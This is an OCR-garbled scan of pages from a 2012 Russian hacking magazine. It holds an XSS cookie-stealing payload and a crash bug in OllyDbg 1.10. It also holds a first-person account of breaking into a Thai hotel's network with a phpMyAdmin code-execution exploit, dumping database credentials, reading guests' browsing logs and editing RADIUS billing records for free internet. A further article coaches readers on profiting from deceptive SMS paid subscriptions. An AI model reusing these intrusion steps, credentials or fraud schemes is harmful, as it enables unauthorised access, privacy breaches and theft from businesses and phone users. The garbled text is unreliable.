іокеп=%22%ЗЕ%ЗС5сгірі%ЗЕа1егі%28сІоситепі . соокіе%29;%ЗС/ 
5СГІрі%ЗЕ 



ТАР6ЕТ5 



ІМеѵѵзсоор 3.5.3 и возможно более ранние версии, частично 4.0 РСЗ. 



боиліоы 



Обновиться до І\Іеѵѵ5соор3.5.5. 
Отключитьопцию гедІ5Іег_дІоЬаІ5. 
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СѴ55Ѵ2 



4.9 



(АѴ: Ь/АС: Ь/Аи : N/0 : N/1 : М/А:С) 

□пша 

НапоследокповедаемобагевОІІуОЬд 1.10, который может использо- 
ваться в качествеантиотладки. Краткая сутьегозаключается втом, 
что Олька не в состоянии открывать исполняемые файлы с количе- 
ством секций, п ревышающих значение 0x1 Ш. 



ЕХРЮІТ 



Взглянем на псевдокод парсера РЕ-файла, реализованного 
в ОІІуОЬд 1.10: 

ѵоісі Р агБеРітосІиІе* Р) 

//... 

Р->пбѳсі = ІМ итО-РЗесііопБ : 

і-р (Р->пбѳсі > 0 && Р->п5есі < 0x2000) 

{ 

Р->бѳсі = 61оЬа1А11ос(Ѳ. (Р->пбѳсі)*Ѳх28) ; 

// 0x28 == БІ2ео-р(ІМА6Е_5ЕСТІОІ\І_НЕАРЕГО 

} 

і-р (Р->5есі) 

{ 

іпі пКеасІ = ігеасІ(Р->5есі.,1., 

( , Р->п5ес'Р)*Ѳх28. 5~Ргеат) ; // читаем секции из файла 
і-р (пКеас! ! = ( (Р->п5есі)*0х28) ) 

{ 



} 

} 

//... 

іпі с = 0; 

шЬіІе (с < Р->п5есі) 

{ 

іпі ѵоі-рБеі = (Р->5есі) [с] .ѴігіиаІАсІсІгеББ ; 

// Ассѳбб ѵіоіаііоп происходит здесь 

// ... 

с++; 

} 

Какты можешь наблюдать, ежели мы на вход Ольке подаем ис- 
полняемый файл с количеством секций >=0x2000, то происходит 
падение. В качестве справки: 

1. Максимальное количество секций, которое поддержи вает за- 
грузчик в ѴѴіпсІоѵѵзХР, равноОхбО. 

2. Максимальное количество секций, которое поддерживает за- 
грузчик в ѴѴіпсІоѵѵз Ѵізіа и >, равно Охіііі. 

3. Максимальное количество секций, которое поддерживает 
ОІІуОЬд ѵі. 10, равно Охіііі. 



ТАК6ЕТ5 



ОІІуОЬд ѵі. 10. 



БОИЛІСЖ 



Для ОІІуОЬд ѵі. 10 обновлений не существует, поэтому в качестве 
варианта можно использовать ОІІуОЬд 2-й версии или же патчить 1-ю 
Ольку. Успехов! ;1~к~ 
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ЛЕГКИЙ СПОСОБ 
ПОЛУЧЕНИЯ 
БЕСПЛАТНОГО 
ИНТЕРНЕТА 
В ЗАМОРСКОМ ОТЕЛЕ 

В последние годы среди наших 
соотечественников стали крайне популярны 
путешествия в разные далекие страны. Вот 
и я не стал исключением, отправившись 
в конце прошлого года в Таиланд. Сам отдых, 
конечно же, проходил легко и беззаботно... 
Однако все омрачало одно большое «но» — 
интернет в отеле был крайне дорогой и отнюдь 
не безлимитный. 



ЗАВЯЗКА 

Итак, оказавшись в одной из прекраснейших локаций Таиланда, 
я крайне удивился, когда на ресепшене отеля мне сказали, что 
коннект к их ѴѴі- Рі-сетке стоит 900 бат (один бат примерно равен 
одному рублю) за шесть часов! Но так как я приехал не ругаться, 
а просто отдыхать от суеты повседневной жизни, то с миной со- 
жаления на лице все-таки купил логин и пароль для доступа к ин- 
тернету на эти пресловутые шесть часов. Инструкция по коннекту 
выглядела примерно так: 

1. Подключите ваш ноутбукили любое другоеустройство ксети, 
доступной в вашем номере. 

2. Откройте ваш браузер и перейдите по адресу Мір://1. 1.1.1. 

3. Введите ваши имя пользователя и пароль, откроется попап- 
окошкос вашим ІР и обратным отсчетом оставшегося времени. 

4. После завершения работы в интернете выйдите из системы с по- 
мощью ссылки Мір://1.1.1.1/Іодои1.рЬр. 

Как видишь, все банально и просто. Однако через два дня 
активного отдыха все время для честно приобретенных аутентифи- 
кационных данных вышло. Дальше я решил купить еще одни логин 
и пароль, которые также очень быстро закончились. Тут меня одо- 
лела обида и злость на столь жадный отель, и я решил во что бы то 
ни стало выбить себе нормальный доступ в интернет :). 

ЧТО В СЕТКЕ? 

Первым делом я обратил внимание на приведенную выше ин- 
струкцию. Из нее были ясны по крайней мере две простые вещи: 
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Тропический анлим 



вся их система крутилась на рбр, а 1.1. 1.1 — это основной сервер 
сетки отеля для аутентификации. Сначала стоило потестить форму 
авторизации на банальные 5СП_-инъекции вроде «V ог 1=1 — », 
но, конечно же, сразу ничего не вышло. Дальше я решил оста- 
вить в покое эту самую форму и посканить аутентификационный 
сервер с помощью всем известного ОігВизІег'а. Каково же было 
мое удивление, когда спустя всего минуту после начала скана 
была найдена директория со скромным названием ./рЬртуасітіп! 
Быстренько перейдя с помощью браузера в эту директорию, я 
удивился еще больше, ведь версия рЬрМуАсІтіп за номером 3.3.2 
была вполне хакабельной! Оставалось только найти нужный 
сплоит. Таковым оказался «рЬрМуАсІтіп < 3.3.10.2 & < 3.4. 3.1 
Беззіоп Бегіаіігег агЬіІгагу РНР сосіе ехесиііоп ехріоіі» от М4д'а. 
Для начала я просто проверил, действительно ли данная версия 
скрипта уязвима, настроив эксплойт следующим образом: 

/*5е1=1:іп^5*/ 

$ртаиг1 = 1 ІтЕір ://!.!. 1. 1/рбртѵасІтіп/ 1 ; //Тиіі РИА игі 
$рау1оасІ = Т<?рбр рМріп-Ро ( ) ; ?> 1 ; //РНР с осіе іо ехесиіі е 

После запуска всего этого непотребства на экран моего ноут- 



бука вылез вполне корректный вывод информационной функции 
рЬріпЫ]. Таким образом, все мои догадки подтвердились, и мож- 
но было действовать дальше! 

ДЕЙСТВУЕМ 

После небольшого вояжа по серверу я понял, что мне необходи- 
мы доступы к админкам и доступы к БД. Для нахождения оных 
я разведал, где на сервере находятся все файлы с префиксом 
сопПд, и вывел их содержимое на экран воттак (сразу оговорюсь, 
доступных на запись директорий на тот момент яненашел): 

ргіпі: ІіІітІзресіаІсІіагзСехесС'саІ: ./ЗгсІ/рІірзузіп-Ро/сопб^. рИр 
. /рбр/іпс1исІе/сопб§ . рбр . /рІір/ИЬ/сІазз/сІазз . сопб§ . рТір 
./ріір/ііетріаііез/іірі.сіеѵ/асітіп/ааа/* . /р!ір/ыыыасІтіп/ааа/*"’П ; 

В одном из таких конфигов лежали данные для подключения к БД: 

сігіѵег ^тузяі 
Ііозі: = Іосаіііозі: 
рогі: = 3306 
пате = аиІіМ^ыб 





Первая админка 
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ЖАМШС 



Вся 

предоставленная 
информация 
является плодом 
больного 

воображения автора. 
Ни редакция, ни 
автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



Вторая админка 



изег = аи1:1і§ы6 
разз ^3е930с15б9а 

А также где-то тут находился и ІІРІ_ некой админки 
(ЬНр://1.1. 1.1:8080). 

АДМИНКА НОМЕР РАЗ 

Пошерстив немного по найденной базе с помощью все того же 
рИрМуАсітіп, я нашел табличку под названием асітіпз с паролями 
в открытом виде :). Взяв для примера самый очевидный логин 
абтіп с паролем РйззѵѵогсІ, я авторизовался в той самой админке. 

В ней были следующие секции: 

• Ноте; 

• Зіаіиз; 

• Опііпезеззіоп; 

• Ыеіѵѵогк; 

• РігеѵѵаІІ; 

• Расііиз сопЛд; 

• Ысепзе; 

• Зегѵісез; 

• І_осаІ ассоипі; 

• Зузіет. 

Побродив немного по обнаруженной административной части, 
я понял, что ничего интересного она из себя не представляет. 
Единственным более или менее забавным разделом админки был 
«Опііпе 5 е 5 5 і о п » — здесь было видно всех авторизованных поль- 
зователей, причем любого из них можно было кикнуть из сети 
в любой момент с помощью соответствующей кнопки « К і с к » :). Но 
я этого делать не стал и задумался над дальнейшими действиями. 

Итак, найденная админка представляла собой всего лишь что- 
то типа настроек самого сервера или роутера. Однако я узнал, что 
вся сетевая инфраструктура отеля крутится на протоколе РАйІІІЗ 
(Ретоіе АиіЬепІісаІіоп іп ОіаІ-Іп ІІзег Вегѵісе). Дальше я вспомнил 
о вышеупомянутых конфигах и о таких вот строчках в них: 
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зѵзііет 


гасііиздиеиеілгаіі: 1 


89 


зѵзііет 


гасііиздиеие-раіішіі: 1 
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зузііет 


аТ1:ег1о§іп_5І:а1:іс_агр 1 
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§а1:емау 


туір_иг1 ІгНр ://кк1:Ііаі . сот/туір . дзоп . рИр 
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§а1:еыау 


туір_епаЫе 
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Исепзе 


игі ІтПр : //Іісепзекеу . ккііііаі . сош/іісепзе . ріір 
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Іісепзе 


сизііотег зегіаі тут номер 


95 


Исепзе 


сизііотег раззшгеі тут пассворд 



Зайдя на сайт ккіЬаі.сот, я увидел, что эта тайская фирма 
является поставщиком различных РАйІІІЗ-решений для отелей, 
в частности «ККкіЬаі ИЗО Ноізроі ЗоЙѵѵаге». Здесь, конечно, 
было бы логичным зайти под известными мне логином и паролем 
в аккаунт моего отеля на их сайте, поискать исходники установ- 
ленных программ, но я оставил этот вариант на потом. Из описаний 
на сайте ККіЬаі я узнал самое главное — их продукт поставлялся 
в виде двух модулей: того, что я нашел (Соге баіеѵѵау), и собственно 
биллинга. Он-то мне и был нужен! 

АДМИНКА НОМЕР ДВА 

Теперь необходимо было найти биллинг. Для этого я сделал две 
вещи: зарядил ОігВизІег на произвольный брут по символам 0-9а-2_ 
и принялся с помощью сплоита для рЬрМуАбтіп шерстить под- 
контрольный сервер (напоминаю, залиться мне так и не удалось, 
так что это выглядело не совсем тривиальной задачей). Вскоре 
работу ОігВизІег'а мне пришлось прервать, так как я встретил очень 
знакомое название в имени директории — Іізд_ѵ2. Там же находился 
и еще один конфиг БД: 
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Тропический анлим 



□ Иііпд: №00:14 


*1 




14-11 


ІІ5еггтягпе 




Тіте гётліп 


ипіітііегі 


Тіте Шпід 


00:00:14 


Ійдоиі'аапчтпчмлі] 


и 


НЫе гівіаіі 


ІР 


іСй^В 


Іо^іп Нт* * 


201 М 1-03 17:14:41 


^ніііоп Бтеоиі 


Ііпіітііегі 


Уте 


2011-1 1-05 17:14:82 


Ііріаа-й 5р&ей[Ьрг) 


УпЕБтк 


5рее<І{Ьр5) 


ипЕЕтІі 


Вуіе(і) Іп 


і .17 ЬЬ 


ВуЕе(?) Оиі 


2.93 кЬ 



Бесплатный безлимитный интернет 



< ?рМр 

$сІЫіо5І:="1оса1Ііо5І:" ; 
$сІЬи5егпате="1І5^" ; 
$сІЬраз5могсІ=" 'е4526а0-Р6е"; 
$сИэпате="1із§" ; 



представляли собой полный (!) подробный (!) отчет о том, на какую 
ссылку, когда и на какое время заходил юзер! И кто тут говорит 
о конфиденциальности пользовательской информации?! 

САМОЕ ГЛАВНОЕ 

Ладно, оставим логи и вспомним о моей основной цели — бесплат- 
ном интернете в отеле. Сначала я, естественно, попробовал до- 
бавить безлимитного пользователя через сам биллинг. Однако этот 
пользователь при просмотре списка юзеров (и в некоторых других 
списках тоже) находился на самом верху, так что администраторы 
системы вполне могли спалить непонятного анлимщика :). Удалив 
тестовый аккаунт, я отправился в рЬрМуАсІтіп с данными для 
аутентификации в БД биллинга. Успешно авторизовавшись и не- 
много побродив по базе данных, я обратил внимание на табличку 
габсЬеск: 

ТЫБЕКТ ІІМТО ' гаскЬеск' 

( ' ісГ л 'ІІзегМате' ' А1:1:гіЬи1:е ' , 'ор' . 'Ѵаіие' . 

' сііеск ігіте ' ) ѴАШЕ5 

(1, 'XXX', 'РаЗЗМОГСГ., ' р@55М0ГСІ ' , е), 

(5, 'XXX', 'РаззмогсГ, 'О^аХпи',, в), 

(4. Чез-ЕІ'. 1 РаззмогсІ 1 . '1234'. 0). 

(6. 'XXX'. 1 Раззмогсі 1 , 'ЫдНаСА" . 0). 

(7, ' XXX ' ' Ра з зшо г с Г . ' уАп і МЫ 1 . 0) , 



Эта абракадабра до боли напоминала выданные мне ранее на 
ресепшене логин и пароль. Бинго! 

Дальше я немного глубже поизучал эту табличку и понял, что 
безлимитные аккаунты в ней создаются путем замены значения 
«РаззѵѵогсІ» в поле «АигіЬиІе» на значение «Ехріге-БізаЫесІ», 
а также путем подстановки какой-нибудь прошедшей даты в поле 
«сЬеск_Ііте». Для незаметности я нашел где-то посередине 
(это важно, мой аккаунттогда не был бы виден сразу ни в ка- 
ких списках биллинга) таблицы старый просроченный аккаунт 
с «РаззѵѵогсІ», изменил его имя, пароль и другие поля, описанные 
выше, и сохранил новый, проапгрейженный вариант пользовате- 
лей в базу. :) 



Зіо^біе = Ѵѵаг/Іо^/Ііз^/Ііз^ ѵ2.1о^' 
?> 



Дальше, натравив свой браузер на Ьир://1.1.1.1/Іізд_ѵ2/, я увидел 
авторизационное окошко (кстати, посмотреть на демку биллинга 
ты сможешь по адресу ѵѵѵѵѵѵ.ккіЬаі.сот/сІето/ ). Введя в это окошко 
уже знакомые тебе данные абтіп; РйззѵѵогсІ, я очутился в админи- 
страторском аккаунте биллинга своего отеля :). Здесь разделы уже 
выглядели повеселее: 

• АсІтіпІІзег; 

• бепегаіе Ассоипі; 

• ІІзег Мападег; 

• Сгоир Мападег; 

• ОаІаЬазе Мізс.; 

• РеПІШау; 

• МРТбМопіІог; 

• ВіІІіпд Рерогі; 

• І_АѴѴ Рерогі; 

• Опііпе ІІзег; 

• І_одОиЕ 

Побродив по биллингу и осознав свою всесильность (легко 
можно было создавать/удалять/редактировать юзеров, просма- 
тривать финансовые отчеты, редактировать «крутость» групп 
пользователей и так далее), я нашел ссылку на Му5СП_ 5ц иісі 
Ассезз Рерогі 2.1.4 (Ьир://1.1.1.1:8080/тузаг/). Эта веселая софти- 
на позволяла легко и просто искать по ІР или МАС-адресу логи 
пользования интернетом постояльцев отеля. Причем эти логи 



НАПУТСТВИЕ 

Ну вот и все. Я достиг своей цели, получил бесплатный безли- 
митный интернет (который и так по дефолту должен быть во всех 
отелях) и тайно наказал за жадность админов моего резорта. Все 
оставшиеся дни отдыха я спокойно мог выходить в Сеть, не боясь, 
что часы на моем аккаунте внезапно закончатся. Надеюсь, что 
тебе понравилась эта история и ты вынесешь из нее какую-нибудь 
пользу. На этом разреши откланяться. □С 



РАйІІІЗ 



ВА0ІІІ5 — это протокол, разработанный 
для передачи сведений между центральной 
платформой и оборудованием, а также для 
реализации аутентификации, авторизации 
и сбора сведений об использованных 
ресурсах. ВА0ІІІ5 применяют для системы 
тарификации использованных ресурсов 
конкретным пользователем/абонентом. 

По сути, это ІМеІѵѵогк Ассе55 Бегѵег с системой 
биллинга. 



• йігВизІег: 
Ы1.1у/о65.М2: 

• рЬрМуАсітіп< 
3 . 3 . 10.2 & < 3 . 4 . 3.1 
Беззіоп Бегіаіііег 
агЫігагу РНРсосІе 
ехесибоп ехріоіі: 
Ьіі.Іу/ЛеІ2к; 

• немного про 
КАОІІІБ: 

ги.ѵѵікіресПа.огд/ 

уѵікі/КАРШБ . 
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МАЛЕНЬКИЕ 

СЕКРЕТЫ 



N01?® 



БОЛЬШИХ ДЕНЕГ 



ВСЕ ТОНКОСТИ ЗАРАБОТКА НА БИРЖАХ 
5М5-П0ДПИС0К И АРБИТРАЖЕ ТРАФИКА 



В одном из прошлых номеров нашего журнала я рассказал тебе о том, 
как всякие нехорошие личности обманывают простых людей с помощью 
фальшивых 5М5. Пришло время узнать, что же творится внутри 
соответствующих «серых» партнерских программ, а также познакомиться 

с таким словом, как арбитраж. 
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Маленькие секреты больших денег 



БИРЖИ ПОДПИСОК 

Останавливаться на том, что такое подписка и псевдоподписка, 
мы не будем (я надеюсь, что ты читаешь каждый номер ][). Зато 
остановимся на другом. Представь следующую ситуацию: черный 
5Е0-мастер добыл несколько подписок, но ему не хочется ждать, 
когда же на них накапает нужное количество денег, ведь сумма 
ребилла (автоматический повторный платеж) невелика — напри- 
мер, для «Мегафона» и «Билайна» она составляет максимум 20 
рублей в день. Что ему надо сделать? Правильно, продать подпи- 
ски тем, кто сможет подождать, когда совокупность всех ребил- 
лов составит приличную сумму. Вот только где ему это сделать? 

Не бегать же по форумам и говорить каждому «Купите у меня, 
пожалуйста, десяток подписочек»? Конечно же, нет! Во многих 
партнерских программах организована такая вещь, как биржа 
подписок. Биржа подписок представляет собой автоматизиро- 
ванную систему купли-продажи активных подписок (то есть тех 
которые работают и приносят деньги на данный момент). Таким 
образом, те люди, которым не хочется вникать во все тонкости 
добычи подписок, могут просто купить уже добытые кем-то под- 
писки и подождать, когда они принесут приемлемое количество 
денег (перепродавать одну и ту же подписку обычно запрещено). 
Причем купить уже «сдохшую» подписку нельзя — биржа авто- 
матически следит за тем, чтобы весь выставленный на ней стафф 
был активным. Если от какой-то подписки человек отписался, 
то биржа удалит ее самостоятельно. Очень удобно! Но ведь не 
каждая подписка может принести золотые горы. В таком случае 
необходимо знать хотя бы общие рекомендации по правильному 
использованию таких бирж: 

1. Слишком дешевые подписки покупать не следует. 

2 . Не надо покупать подписки со взрослой тематикой (у них от- 
вратительный ребилл, а также, как показывает практика, денег 
у таких людей на мобильниках нет). 

3. За слишком дорогими подписками тоже гнаться не стоит, дорого 
— это еще не значит качественно. 

4 . Не следует покупать подписки, у которых последний ребилл 
был более пяти дней назад. 

5 . Необходимо пользоваться встроенными в биржу фильтрами, 
они помогут найти самые вкусные подписки. 

6. Покупка подписокизсоциальныхсетей — сомнительноеудо- 
вольствие. 

Также стоит помнить о том, что в покупку подписок надо 
вкладывать достаточно внушительные деньги. Если ты хочешь 
вложить в закупку подписок 1000 рублей, то вряд ли у тебя по- 
лучится уйти в плюс. Эта тысяча пойдет только на тестирование 
и прощупывание выгодных подписок. Обычно люди приходят 
в 5М5-рынок с суммами, где есть по крайней мере четыре нуля. 

Запомни: подписки не могут являться долгосрочной инвести- 
цией. Все очень просто — в любой день могут выйти серьезные 
поправки в ФЗ «О связи», в результате которых все подписки 
насильно отпишут, и ты останешься у разбитого корыта. Такие по- 
правки, кстати, уже обсуждаются в правительстве, поэтому забы- 
вать о них я бы тебе не советовал. К тому же помни, что это отнюдь 
не «белые» деньги и ты будешь зарабатывать на чьей-то глупости. 



КУПИТЬ УЖЕ «СДОХШУЮ» 
ПОДПИСКУ НЕЛЬЗЯ — 

БИРЖА АВТОМАТИЧЕСКИ 
СЛЕДИТ ЗА ТЕМ, ЧТОБЫ ВЕСЬ 
ВЫСТАВЛЕННЫЙ НА НЕЙ 
СТАФФ БЫЛ АКТИВНЫМ 



АРБИТРАЖ 

Что такое арбитраж в теме подписок и 5Е0 в частности, знает 
не каждый. Хотя на самом деле все звучит довольно просто — это 
покупка трафика в одном месте и перепродажа его в другом. Под 
трафиком подразумеваются некоторые посетители, зашедшие 
на сайт. Воттолько сайта тут практически никакого не надо. 

Так в чем же фишка? А фишка в так называемой прокладке, 
через которую надо агрегировать трафик. Прокладкой называ- 
ется одностраничный сайт, который привлекает пользователя 
какими-либо промоматериалами, чтобы он перешел на платник. 
Прокладка несет в себе побудительный элемент для посетителя 
(то есть рассказывает про тему на платнике плюс предоставляет 
интересную информацию), а также является эффективным сред- 
ством для отслеживания различных показателей (это самый глав- 
ный фактор, но о нем дальше). То, что прокладка действительно 
нужна, не обсуждается, но вот где ее достать, если ты не можешь 
сам написать интересный одностраничный сайт, который может 
побудить пользователя перейти на платник? Правильно, можно 
позаимствовать у других :). Для этого понадобится ЗсгарВоок (ад- 
дон Рігеіюх для сохр анения веб-страниц) и умение найти чужую 
прокладку под нужную тебе тематику. Обычно прокладки выгля- 
дят так: страничка с большой кнопкой «Перейти» и материалами 
о чем-то, что интересует потенциального посетителя (чаще всего 
это графические материалы). Естественно, прокладку надо как-то 
раскрутить, и поэтому ее рекламируют с помощью различных ис- 
точников трафа. 

При этом такими источниками трафа может быть прежде всего 
всеми «любимая» тизерная реклама. Для тех, кто не в курсе: 
тизерная реклама — это такие окошечки с рекламой, которые по- 
стоянно маячат на сайтах вроде зайцев. нет. Тизер состоит из кар- 
тинки и текста. Ты не поверишь, но огромная куча пользователей 
щелкает по этим тизерам и даже в итоге может заказать товар. 
Любой тизер, да и, в принципе, любая реклама, характеризуется 
параметром СТР, который показывает, как часто люди кликают 
на него. СТР рассчитывается по следующей формуле (измеряется 
в процентах): 

СТК = количество кликов / количество показов * 100% 



Выбор темы 



Создание 
прокладки 
и тизеров 



Выбор 

тизерной сети 



Выбор, куда 
сливать траф 




Простая схема арбитража 
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С КАКИМИ ТЕМАМИ 
НЕ СТОИТ СВЯЗЫВАТЬСЯ 



1. Адалт 

Тут паршивый ребилл, и это понятно, если 
взглянуть на аудиторию, которая состоит 
из малолеток. 

2. Социальные сети 

Тут аналогично с адалтом, хотя с ребиллом 
дела чуть получше. Иногда можно даже 
добиться весомых результатов, но это 
могут сделать только опытные 5Е0- 
мастера. 



Платники в зегіоизрагіпег.ги 



Естественно, чем выше процент, тем круче тизер. При этом 
твои тизеры прокручивают так называемые тизерные сети. 

Схема простая: ты делаешь интересный тизер, потом запуска- 
ешь рекламную кампанию в тизерной сети, и вуаля — твой тизер 
видят тысячи пользователей. При этом ты платишь только в том 
случае, если юзер все-таки кликнул по твоей рекламе. Это очень 
удобно, так как если бы оплата была только за просмотры, то тебе 
потребовались бы просто нереальные бюджеты. Как ты уже до- 
гадался, с помощью тизера мы перенаправляем пользователя на 
нашу прокладку. Хочется добавить, что не следует делать тизеры 
слишком яркими. Хотя кажется, что чем ярче, тем лучше, но это 
на самом деле не так. Яркость отвлекает юзера от смысла, и он 
захочет кликнуть на такой тизер не потому, что ему понравился 
именно смысл, а потому, что ему просто станет любопытно, что 
там дальше (а такой человек вряд ли приобретет товар). Есте- 
ственно, означенное тупое любопытство тебе не нужно, ведь твои 
деньги будут утекать в никуда. К тому же не забудь и о тексте 
— он должен подходить к изображению по смыслу, а не быть 
простым набором букв, которые непонятно зачем вставили под 



картинку. Также многие новички забывают про такую опцию в ти- 
зерных сетях, как геотаргетинг. Эта штука позволяет определить 
место, где именно будет откручиваться твоя реклама, конкретно 
по каким странам. Если ты не поставишьтам Россию (а Россия 
нужна в первую очередь), то можешь получить кучу иностранцев, 
которым абсолютно все равно, что это за товар. 

Другим источником трафа является банальная реклама в со- 
циальных сетях. Но тут надо быть осторожным, ведь неверные на- 
стройки рекламного объявления и его неправильное составление 
могут привести тебя к краху. Тот же «ВКонтакте» может съесть 
огромную кучу денег всего за каких-то десять минут. Причем 
необходимо делать свое объявление аккуратно, не противореча 
правилам социальной сети. Вообще многие откручивают свою ре- 
кламу именно во «ВКонтакте», но обратить внимание можно и на 
РасеЬоок, І_оѵеРІапеІ и тому подобное. В них тоже есть люди. :) 

ПОЗНАЙ ДАО АНАЛИТИКИ! 

Немногие арбитражники задумываются над таким инструментом, 
как простая аналитика трафа для своих прокладок. Зачем она 



КАКИЕ ТЕМЫ ПРИБЫЛЬНЫ 



1 Диеты 


о 


Гороскопы 


о 


Развлекательные 


/ 


Игры 
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1 | Тема диет настолько 


2 


Гороскопы тоже 


3 


темы 


4 


Различные игры яв- 


Э 



Товары в реале 

Это тоже «белая» 



заезжена, что ее знает 
уже, наверное, каждый. Но 
она реально неиссякаема. 
Каждый день появляются 
все новые и новые особи 
женского пола, которым 
безумно хочется сбросить 
пару (а может, и десяток) 
килограммов за короткий 
срок. Денег на мобилах 
у таких особей обычно 
хватает, поэтому проблем 
с ребиллом не предвидится. 
Эта тема достигает своего 
пика весной, когда все 
хотят выйти к лету на пляжи 
стройными и красивыми. 



мегапопулярная тема. Еще 
бы, ведь многим очень 
хочется узнать свою судьбу 
/ что ждет их в этом году 
/ настанет ли конец света 
(нужное подчеркнуть). Ре- 
билл также идет нормаль- 
но, аудитория в целом не 
малолетки, поэтому деньги 
в этой теме есть. Но рабо- 
тать с ней надо аккуратно. 
Неверно поставленная 
реклама и/или реклам- 
ный текст — и все, профит 
выйдет в ноль. 



Эти темы содержат в себе 
огромную кучутрафа, ре- 
билл средний, но хороший. 
Развлекательными темами 
можно считать всякие 
«узнай имя будущего 
мужа» и подобные им. 

В этом случае аудитория 
понимает, что тема носит 
больше развлекательный 
характер, но интерес все 
равно есть. 



ляются уже «белой» темой 
(в отличие от вышеназван- 
ных). Плата БЕО-мастеру 
идет за то, что посети- 
тель зарегистрировался 
в той или иной игрушке. 
Спрос на тему велик, так 
как огромный сегмент 
интернета — бездельники 
либо офисные работники, 
которым нечем заняться. 



тема. Интересна она тем, 
что посетитель купит 
товар, который действи- 
тельно можно «пощупать». 
БЕО-мастер получает 
некоторый процент отза- 
каза. В этом случае работа 
БЕО-мастера рассматрива- 
ется уже в традиционном 
понимании, то есть он 
просто раскручивает чей- 
то проект. 



064 



ХАКЕР 06/161/2012 









Маленькие секреты больших денег 



Лучшие партнеры за прошедшие сутки 

Заработок на подписках и смс 


топ 


Партнер 


Заработок, ГСІІП 


1 


РапсІВ.ЬІі 


61 425,15 


2 


ІГОІОІО 


55806,02 


3 


РапсІВ.Ьіг 


55 147,03 


4 


НеІІо_Азіа 


53958,32 


5 


5ІагтсІ 


49 682,74 


6 


о_0 


46 200,71 









Заработок БЕО-мастеров в ПП за день. Мотивирует, правда? 
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Насірпйкн щгпр 



Создание цели в ГА 



нужна вообще? Первое, для чего тебе это может пригодиться, — 
это отсеивание площадок с некачественным трафиком на уровне 
еще рекламной кампании в той же тизерной сети (так называемое 
составление блэк-листа). Обычно у арбитражников данный про- 
цесс происходит по каким-то непонятным правилам, в которых 
они либо прибегают к банальному визуальному анализу площад- 
ки (нравится или не нравится на вид), либо вообще начинают 
тыкать пальцем в небо и заносить в блэк-лист произвольную 
площадку. Такой подход, конечно же, не является серьезным и в 
дальнейшем может принести только убытки. Простой пример: ты 
смотришь на сайт, на котором будет откручиваться твоя реклама. 
Он сам по себе невзрачный, даже дизайн толковый не смогли 
подобрать. Кажется, что с такого сайта никто вообще не перейдет 
ктебе на прокладку! Но внешность зачастую обманчива, и с него 
к тебе переходит куча людей. Но ты-то об этом не знаешь, у тебя 
нет под рукой наглядных цифр, которые показывают, что да, этот 
сайт банить не стоит. В результате ты заносишь его в блэк-лист, 
а потом долго удивляешься, почему же у тебя нет трафа. Чтобы 
такой ситуации не было, нужно применять инструменты аналити- 



ки. И вот тут тебе поможет великий боодіе. Зоодіе Апаіуіісз (Гугл 
аналитика, он же ГА сокращенно) — это незаменимый инстру- 
мент, который позволит тебе быстро отследить весь трафик на 
твоей прокладке. Плюсы очевидны: ты будешь составлять блэк- 
листы не вслепую, узнаешь, сколько каждый человек пробыл 
на твоем сайте, поймешь, какой тизер действительно приносит 
людей, а какой лучше выбросить на свалку. Но есть и весомый 
минус: ГА — ужасно медленная штука и статистикуты будешь 
получать только лишь два раза в сутки (обычно это утро и вечер). 
Так что, когда поставишь код этого монстра к себе на прокладку, 
не удивляйся, что информация доберется до тебя далеко не сразу. 
Если же прошли сутки и ты так и не получил никаких данных, то 
тут уже дело в тебе, надо внимательно посмотреть мануал по ГА 
и сделать все правильно. Не забудь еще поставить метки на свои 
тизеры, ведь с помощью меток ты сможешь понять, какой тизер 
тебе действительно приносит посетителей. 

У ГА есть дополнительный инструмент, который называется 
цели. Цели являются незаменимой вещью при составлении блэк- 
листа. Например, тебе нужно отследить количество зашедших 



ТОП-5 ПАРТНЕРОК 
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ѴзеМаукі.ги 

Партнерская про- 



партнерских программ, 
в которой также есть 
и биржа подписок. Выбор 
платников достаточно 
широк, различных про- 
моматериалов полно (на 
прокладку точно хватит). 
Сама партнерка является 
закрытой (то есть просто 
так не зарегистрируешь- 
ся), но иногда ребята от- 
крывают регистрацию для 
всех желающих. 



крытая партнерка, которая 
позиционирует себя как 
очень-очень закрытая. 
Настолько закрытая, что 
саппорт иногда говорит 
о том, что он не саппорт :). 
Это не шутка, в некоторые 
периоды так действитель- 
но и происходит. Материа- 
лов на самой партнерке 
навалом, много вкусных 
и разных направлений, но 
попасть туда действитель- 
но трудно. 



ская программа, в которой 
может зарегистрироваться 
каждый (на момент напи- 
сания статьи). Платники: 
адалт, знакомства, а также 
есть несколько развлека- 
тельных площадок. Промо- 
материалы для прокладки 
есть, но их не так много, 
как хотелось бы. В целом 
для партнерки с открытой 
регистрацией ее содержа- 
ние более чем отличное. 



программа с открытой 
регистрацией. Платни- 
ков очень много, есть 
практически все темы, но 
качество некоторых плат- 
ников оставляет желать 
лучшего. В целом неплохая 
партнерка для новичков, 
которые хотят посмотреть, 
что да как. 



грамма по продаже маек. 
Пожалуй, это лучший ва- 
риант для тех, кто не хочет 
связываться с нечестными 
схемами. При этом тебе за- 
платят в том случае, если 
кто-то из твоих посетите- 
лей купит маечку. К слову 
сказать, выбор маек доста- 
точно широк. Регистрация 
в партнерке открытая. 
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Так выглядит биржа подписок 



через твою прокладку на платник посетителей. Для этого ты, 
естественно, вставляешь код аналитики к себе на эту самую про- 
кладку, а также создаешь отдельный файл (например, ѵоп.МтІ), 
на который попадает пользователь, нажавший кнопку «Перейти» 
или ее аналог. Важно: этот файл должен лежать в корне домена 
и иметь собственно код аналитики и редирект на платник: 

<зсгір1: 1:ѵ ре="1:ех1:/іаѵа5сгір 1:"> 

Іосаіііоп . гер1асе( "ІтІіТр : //ссылка на платник") 

Получается эдакая «прокладка в прокладке». После того как 
все сделано, ты идешь в аналитику, выбираешь свой домен и до- 
бавляешь цель (кнопка «Добавить цель»), как-нибудь обзываешь 
ее, ставишь тип цели «Переход на страницу», далее выставляешь 
в поле «Целевой ІІРІ_» свою ссылку на файл ѵоп.ЫтІ и сохраня- 
ешь все это дело. Теперь ты можешь легко отслеживать, сколько 
посетителей нажало на кнопку перехода на платник. Это позволит 



тебе понять как минимум то, хороша ли твоя прокладка или нет. 
Логично, что если прокладка «не цепляет» посетителя, то коли- 
чество переходов на платник будет маленьким. Аналогичным об- 
разом ты можешь создать цель на то, сколько ботов попало к тебе 
на прокладку, а также с каких именно площадок они приходят. 
Увидев нехорошие площадки с ботами, ты легко занесешь их 
в блэк-лист тизерной сети и получишь только настоящий «живой» 
трафик. 

